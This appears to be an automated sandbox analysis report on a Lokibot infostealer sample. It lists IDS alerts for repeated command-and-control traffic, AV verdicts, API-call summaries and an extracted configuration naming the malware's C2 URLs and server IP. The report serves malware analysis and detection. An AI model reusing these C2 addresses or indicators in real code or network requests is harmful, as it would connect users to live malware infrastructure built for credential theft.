                  2025-02-20T03:43:41.134380+010020216411A Network Trojan was detected192.168.2.449751104.21.64.180TCP
                  2025-02-20T03:43:43.094784+010020216411A Network Trojan was detected192.168.2.449752104.21.64.180TCP
                  2025-02-20T03:43:45.102723+010020216411A Network Trojan was detected192.168.2.449753104.21.64.180TCP
                  2025-02-20T03:43:46.997245+010020216411A Network Trojan was detected192.168.2.449754104.21.64.180TCP
                  2025-02-20T03:43:48.866259+010020216411A Network Trojan was detected192.168.2.449755104.21.64.180TCP
                  2025-02-20T03:43:50.820013+010020216411A Network Trojan was detected192.168.2.449756104.21.64.180TCP
                  2025-02-20T03:43:52.721741+010020216411A Network Trojan was detected192.168.2.449757104.21.64.180TCP
                  2025-02-20T03:43:54.693351+010020216411A Network Trojan was detected192.168.2.449758104.21.64.180TCP
                  2025-02-20T03:43:56.661305+010020216411A Network Trojan was detected192.168.2.449759104.21.64.180TCP
                  2025-02-20T03:43:58.705695+010020216411A Network Trojan was detected192.168.2.449760104.21.64.180TCP
                  2025-02-20T03:44:00.632178+010020216411A Network Trojan was detected192.168.2.449761104.21.64.180TCP
                  2025-02-20T03:44:02.549016+010020216411A Network Trojan was detected192.168.2.449762104.21.64.180TCP
                  2025-02-20T03:44:04.348269+010020216411A Network Trojan was detected192.168.2.449763104.21.64.180TCP
                  2025-02-20T03:44:06.337593+010020216411A Network Trojan was detected192.168.2.449764104.21.64.180TCP
                  2025-02-20T03:44:08.290722+010020216411A Network Trojan was detected192.168.2.449766104.21.64.180TCP
                  2025-02-20T03:44:10.316672+010020216411A Network Trojan was detected192.168.2.449768104.21.64.180TCP
                  2025-02-20T03:44:12.216353+010020216411A Network Trojan was detected192.168.2.449779104.21.64.180TCP
                  2025-02-20T03:44:14.257584+010020216411A Network Trojan was detected192.168.2.449793104.21.64.180TCP
                  2025-02-20T03:44:16.237190+010020216411A Network Trojan was detected192.168.2.449806104.21.64.180TCP
                  2025-02-20T03:44:18.180783+010020216411A Network Trojan was detected192.168.2.449819104.21.64.180TCP
                  2025-02-20T03:44:20.117514+010020216411A Network Trojan was detected192.168.2.449829104.21.64.180TCP
                  2025-02-20T03:44:22.080002+010020216411A Network Trojan was detected192.168.2.449840104.21.64.180TCP
                  2025-02-20T03:44:24.005441+010020216411A Network Trojan was detected192.168.2.449854104.21.64.180TCP
                  2025-02-20T03:44:25.986832+010020216411A Network Trojan was detected192.168.2.449868104.21.64.180TCP
                  2025-02-20T03:44:27.785264+010020216411A Network Trojan was detected192.168.2.449881104.21.64.180TCP
                  2025-02-20T03:44:29.675258+010020216411A Network Trojan was detected192.168.2.449892104.21.64.180TCP
                  2025-02-20T03:44:31.765736+010020216411A Network Trojan was detected192.168.2.449908104.21.64.180TCP
                  2025-02-20T03:44:33.834170+010020216411A Network Trojan was detected192.168.2.449922104.21.64.180TCP
                  2025-02-20T03:44:35.821785+010020216411A Network Trojan was detected192.168.2.449934104.21.64.180TCP
                  2025-02-20T03:44:37.738492+010020216411A Network Trojan was detected192.168.2.449946104.21.64.180TCP
                  2025-02-20T03:44:39.722812+010020216411A Network Trojan was detected192.168.2.449958104.21.64.180TCP
                  2025-02-20T03:44:41.717939+010020216411A Network Trojan was detected192.168.2.449973104.21.64.180TCP
                  2025-02-20T03:44:43.553868+010020216411A Network Trojan was detected192.168.2.449986104.21.64.180TCP
                  2025-02-20T03:44:45.418212+010020216411A Network Trojan was detected192.168.2.449999104.21.64.180TCP
                  2025-02-20T03:44:47.367804+010020216411A Network Trojan was detected192.168.2.450013104.21.64.180TCP
                  2025-02-20T03:44:49.319994+010020216411A Network Trojan was detected192.168.2.450027104.21.64.180TCP
                  2025-02-20T03:44:51.269807+010020216411A Network Trojan was detected192.168.2.450041104.21.64.180TCP
                  2025-02-20T03:44:53.251485+010020216411A Network Trojan was detected192.168.2.450053104.21.64.180TCP
                  2025-02-20T03:44:55.447771+010020216411A Network Trojan was detected192.168.2.450056104.21.64.180TCP
                  2025-02-20T03:44:57.397582+010020216411A Network Trojan was detected192.168.2.450057104.21.64.180TCP
                  2025-02-20T03:44:59.369050+010020216411A Network Trojan was detected192.168.2.450058104.21.64.180TCP
                  2025-02-20T03:45:01.395935+010020216411A Network Trojan was detected192.168.2.450059104.21.64.180TCP
                  2025-02-20T03:45:03.336005+010020216411A Network Trojan was detected192.168.2.450060104.21.64.180TCP
                  2025-02-20T03:45:05.459884+010020216411A Network Trojan was detected192.168.2.450061104.21.64.180TCP
                  2025-02-20T03:45:07.274491+010020216411A Network Trojan was detected192.168.2.450062104.21.64.180TCP
                  2025-02-20T03:45:09.425072+010020216411A Network Trojan was detected192.168.2.450063104.21.64.180TCP
                  2025-02-20T03:45:11.338444+010020216411A Network Trojan was detected192.168.2.450064104.21.64.180TCP
                  2025-02-20T03:45:13.295502+010020216411A Network Trojan was detected192.168.2.450065104.21.64.180TCP
                  2025-02-20T03:45:15.286586+010020216411A Network Trojan was detected192.168.2.450066104.21.64.180TCP
                  2025-02-20T03:45:17.298173+010020216411A Network Trojan was detected192.168.2.450067104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-20T03:43:14.532930+010028257661Malware Command and Control Activity Detected192.168.2.449731104.21.64.180TCP
                  2025-02-20T03:43:16.479030+010028257661Malware Command and Control Activity Detected192.168.2.449732104.21.64.180TCP
                  2025-02-20T03:43:17.451575+010028257661Malware Command and Control Activity Detected192.168.2.449733104.21.64.180TCP
                  2025-02-20T03:43:19.442017+010028257661Malware Command and Control Activity Detected192.168.2.449734104.21.64.180TCP
                  2025-02-20T03:43:21.771429+010028257661Malware Command and Control Activity Detected192.168.2.449735104.21.64.180TCP
                  2025-02-20T03:43:23.729997+010028257661Malware Command and Control Activity Detected192.168.2.449736104.21.64.180TCP
                  2025-02-20T03:43:25.651126+010028257661Malware Command and Control Activity Detected192.168.2.449737104.21.64.180TCP
                  2025-02-20T03:43:27.752713+010028257661Malware Command and Control Activity Detected192.168.2.449738104.21.64.180TCP
                  2025-02-20T03:43:29.660543+010028257661Malware Command and Control Activity Detected192.168.2.449741104.21.64.180TCP
                  2025-02-20T03:43:31.521910+010028257661Malware Command and Control Activity Detected192.168.2.449745104.21.64.180TCP
                  2025-02-20T03:43:33.456489+010028257661Malware Command and Control Activity Detected192.168.2.449747104.21.64.180TCP
                  2025-02-20T03:43:35.363345+010028257661Malware Command and Control Activity Detected192.168.2.449748104.21.64.180TCP
                  2025-02-20T03:43:37.303125+010028257661Malware Command and Control Activity Detected192.168.2.449749104.21.64.180TCP
                  2025-02-20T03:43:39.205648+010028257661Malware Command and Control Activity Detected192.168.2.449750104.21.64.180TCP
                  2025-02-20T03:43:41.134380+010028257661Malware Command and Control Activity Detected192.168.2.449751104.21.64.180TCP
                  2025-02-20T03:43:43.094784+010028257661Malware Command and Control Activity Detected192.168.2.449752104.21.64.180TCP
                  2025-02-20T03:43:45.102723+010028257661Malware Command and Control Activity Detected192.168.2.449753104.21.64.180TCP
                  2025-02-20T03:43:46.997245+010028257661Malware Command and Control Activity Detected192.168.2.449754104.21.64.180TCP
                  2025-02-20T03:43:48.866259+010028257661Malware Command and Control Activity Detected192.168.2.449755104.21.64.180TCP
                  2025-02-20T03:43:50.820013+010028257661Malware Command and Control Activity Detected192.168.2.449756104.21.64.180TCP
                  2025-02-20T03:43:52.721741+010028257661Malware Command and Control Activity Detected192.168.2.449757104.21.64.180TCP
                  2025-02-20T03:43:54.693351+010028257661Malware Command and Control Activity Detected192.168.2.449758104.21.64.180TCP
                  2025-02-20T03:43:56.661305+010028257661Malware Command and Control Activity Detected192.168.2.449759104.21.64.180TCP
                  2025-02-20T03:43:58.705695+010028257661Malware Command and Control Activity Detected192.168.2.449760104.21.64.180TCP
                  2025-02-20T03:44:00.632178+010028257661Malware Command and Control Activity Detected192.168.2.449761104.21.64.180TCP
                  2025-02-20T03:44:02.549016+010028257661Malware Command and Control Activity Detected192.168.2.449762104.21.64.180TCP
                  2025-02-20T03:44:04.348269+010028257661Malware Command and Control Activity Detected192.168.2.449763104.21.64.180TCP
                  2025-02-20T03:44:06.337593+010028257661Malware Command and Control Activity Detected192.168.2.449764104.21.64.180TCP
                  2025-02-20T03:44:08.290722+010028257661Malware Command and Control Activity Detected192.168.2.449766104.21.64.180TCP
                  2025-02-20T03:44:10.316672+010028257661Malware Command and Control Activity Detected192.168.2.449768104.21.64.180TCP
                  2025-02-20T03:44:12.216353+010028257661Malware Command and Control Activity Detected192.168.2.449779104.21.64.180TCP
                  2025-02-20T03:44:14.257584+010028257661Malware Command and Control Activity Detected192.168.2.449793104.21.64.180TCP
                  2025-02-20T03:44:16.237190+010028257661Malware Command and Control Activity Detected192.168.2.449806104.21.64.180TCP
                  2025-02-20T03:44:18.180783+010028257661Malware Command and Control Activity Detected192.168.2.449819104.21.64.180TCP
                  2025-02-20T03:44:20.117514+010028257661Malware Command and Control Activity Detected192.168.2.449829104.21.64.180TCP
                  2025-02-20T03:44:22.080002+010028257661Malware Command and Control Activity Detected192.168.2.449840104.21.64.180TCP
                  2025-02-20T03:44:24.005441+010028257661Malware Command and Control Activity Detected192.168.2.449854104.21.64.180TCP
                  2025-02-20T03:44:25.986832+010028257661Malware Command and Control Activity Detected192.168.2.449868104.21.64.180TCP
                  2025-02-20T03:44:27.785264+010028257661Malware Command and Control Activity Detected192.168.2.449881104.21.64.180TCP
                  2025-02-20T03:44:29.675258+010028257661Malware Command and Control Activity Detected192.168.2.449892104.21.64.180TCP
                  2025-02-20T03:44:31.765736+010028257661Malware Command and Control Activity Detected192.168.2.449908104.21.64.180TCP
                  2025-02-20T03:44:33.834170+010028257661Malware Command and Control Activity Detected192.168.2.449922104.21.64.180TCP
                  2025-02-20T03:44:35.821785+010028257661Malware Command and Control Activity Detected192.168.2.449934104.21.64.180TCP
                  2025-02-20T03:44:37.738492+010028257661Malware Command and Control Activity Detected192.168.2.449946104.21.64.180TCP
                  2025-02-20T03:44:39.722812+010028257661Malware Command and Control Activity Detected192.168.2.449958104.21.64.180TCP
                  2025-02-20T03:44:41.717939+010028257661Malware Command and Control Activity Detected192.168.2.449973104.21.64.180TCP
                  2025-02-20T03:44:43.553868+010028257661Malware Command and Control Activity Detected192.168.2.449986104.21.64.180TCP
                  2025-02-20T03:44:45.418212+010028257661Malware Command and Control Activity Detected192.168.2.449999104.21.64.180TCP
                  2025-02-20T03:44:47.367804+010028257661Malware Command and Control Activity Detected192.168.2.450013104.21.64.180TCP
                  2025-02-20T03:44:49.319994+010028257661Malware Command and Control Activity Detected192.168.2.450027104.21.64.180TCP
                  2025-02-20T03:44:51.269807+010028257661Malware Command and Control Activity Detected192.168.2.450041104.21.64.180TCP
                  2025-02-20T03:44:53.251485+010028257661Malware Command and Control Activity Detected192.168.2.450053104.21.64.180TCP
                  2025-02-20T03:44:55.447771+010028257661Malware Command and Control Activity Detected192.168.2.450056104.21.64.180TCP
                  2025-02-20T03:44:57.397582+010028257661Malware Command and Control Activity Detected192.168.2.450057104.21.64.180TCP
                  2025-02-20T03:44:59.369050+010028257661Malware Command and Control Activity Detected192.168.2.450058104.21.64.180TCP
                  2025-02-20T03:45:01.395935+010028257661Malware Command and Control Activity Detected192.168.2.450059104.21.64.180TCP
                  2025-02-20T03:45:03.336005+010028257661Malware Command and Control Activity Detected192.168.2.450060104.21.64.180TCP
                  2025-02-20T03:45:05.459884+010028257661Malware Command and Control Activity Detected192.168.2.450061104.21.64.180TCP
                  2025-02-20T03:45:07.274491+010028257661Malware Command and Control Activity Detected192.168.2.450062104.21.64.180TCP
                  2025-02-20T03:45:09.425072+010028257661Malware Command and Control Activity Detected192.168.2.450063104.21.64.180TCP
                  2025-02-20T03:45:11.338444+010028257661Malware Command and Control Activity Detected192.168.2.450064104.21.64.180TCP
                  2025-02-20T03:45:13.295502+010028257661Malware Command and Control Activity Detected192.168.2.450065104.21.64.180TCP
                  2025-02-20T03:45:15.286586+010028257661Malware Command and Control Activity Detected192.168.2.450066104.21.64.180TCP
                  2025-02-20T03:45:17.298173+010028257661Malware Command and Control Activity Detected192.168.2.450067104.21.64.180TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://touxzw.ir/sccc/five/fre.phpAvira URL Cloud: Label: malware
                  Source: 1.2.svchost.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                  Source: vsf098633534.exeVirustotal: Detection: 30%Perma Link
                  Source: vsf098633534.exeReversingLabs: Detection: 28%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: vsf098633534.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B4445A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4C6D1 FindFirstFileW,FindClose,0_2_00B4C6D1
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B4C75C
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4EF95
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4F0F2
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4F3F3
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B437EF
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B43B12
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4BCBC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49819 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49819 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49819 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49819 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49749
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49760
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49754
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49868 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49868 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49868 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49733
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 104.21.64.1:80
